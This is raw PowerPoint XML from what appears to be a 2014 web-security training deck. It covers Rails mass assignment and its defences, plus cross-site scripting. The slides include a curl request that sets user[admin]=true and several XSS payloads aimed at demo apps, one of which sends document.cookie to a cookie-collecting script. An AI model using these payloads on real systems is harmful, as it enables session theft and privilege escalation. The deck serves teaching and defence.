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61" r:id="rId4"/>
    <p:sldId id="262" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="272" r:id="rId14"/>
    <p:sldId id="269" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="283" r:id="rId18"/>
    <p:sldId id="288" r:id="rId19"/>
    <p:sldId id="277" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="286"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1" autoAdjust="0"/>
    <p:restoredTop sz="86358"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96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9D858-9A15-40AB-B16E-A3BACEF77609}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/14/2014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78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88412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78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69421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curl -d   "user[email]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mo@cyclone.com&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[password]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mordecai&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>password_confirmation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mordec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ai&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[name]=mo%20kraushar&amp;user[admin]=true" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/cyclone/users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A2A78E2C-7FBB-4AF8-A981-788D2219CD4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2328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Defensive measures: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attr_protected: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attr_accessible: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Rails 3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Mass Assignment Roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Strong Parameters gem, available for use with Rails 3, and a default in Rails 4 release</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A2A78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362485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curl -d   "user[email]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mo@cyclone.com&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[password]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mordecai&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>password_confirmation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mordec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ai&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[name]=mo%20kraushar&amp;user[admin]=true" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/cyclone/users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A2A78E2C-7FBB-4AF8-A981-788D2219CD4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31116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xfrm>
            <a:off x="722143" y="4345680"/>
            <a:ext cx="5485773" cy="4114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i="0"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92" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="734480" indent="-282492" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1129970" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1581958" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2033946" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2485934" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2937921" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3389909" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3841897" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D8D16E82-EAF9-4819-B341-ABA392EA96D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159321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xfrm>
            <a:off x="722143" y="4345680"/>
            <a:ext cx="5485773" cy="41146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i="0"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92" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="734480" indent="-282492" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1129970" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1581958" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2033946" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2485934" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2937921" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3389909" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3841897" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D8D16E82-EAF9-4819-B341-ABA392EA96D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382169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392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="734480" indent="-282492" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1129970" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1581958" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2033946" indent="-225994" defTabSz="913392" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2485934" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2937921" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3389909" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3841897" indent="-225994" defTabSz="913392" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4E034642-5368-49EA-A5F8-06779D91885C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367256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78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350641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78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372497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78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64089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78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18136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eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150"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A2A78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236610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eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A2A78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182328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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>http://bwa/vicnum/cgi-bin/guessnum1.pl?player=m&lt;i&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>("HI");&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t> = "http://www.owasp.org/"&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>); &lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;location='http://bwa/cgi-bin/cookie.cgi?' +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2900" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A2A78E2C-7FBB-4AF8-A981-788D2219CD4C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134592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78E2C-7FBB-4AF8-A981-788D2219CD4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8136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200610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385307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84618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741FAB-DDC0-4C8D-A2C0-9BFAD0961D10}"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1478112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41FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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216533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741FAB-DDC0-4C8D-A2C0-9BFAD0961D10}"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190622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741FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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180446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741FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
